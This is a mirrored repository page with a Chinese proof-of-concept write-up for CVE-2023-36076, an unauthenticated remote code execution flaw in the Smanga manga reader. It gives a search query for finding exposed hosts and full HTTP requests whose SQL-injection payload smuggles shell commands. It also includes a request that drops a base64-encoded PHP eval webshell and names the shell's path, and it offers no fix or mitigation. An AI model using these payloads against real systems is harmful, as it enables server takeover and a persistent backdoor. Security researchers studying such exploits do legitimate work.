admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 19:07:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/smanga/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md

74 lines
3.2 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# Smanga未授权远程代码执行漏洞(CVE-2023-36076)
# 一、漏洞简介
Smanga无需配置docker直装的漫画流媒体阅读工具。以emby plex为灵感为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞攻击者可在目标主机执行任意命令获取服务器权限。
# 二、影响版本
+ Smanga
# 三、资产测绘
+ hunter`web.title=="smanga"`
+ 特征
![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-384375.png)
# 四、漏洞复现
```java
POST /php/manga/delete.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```
![1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-384132.png)
获取命令执行结果
```java
GET /php/manga/1.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```
![1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-693600.png)
写入webshell
```java
POST /php/manga/delete.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```
webshell地址
```java
/php/manga/1.php
```
![1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-383079.png)
> 更新: 2024-02-29 23:55:42
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33>
Reference in New Issue Copy Permalink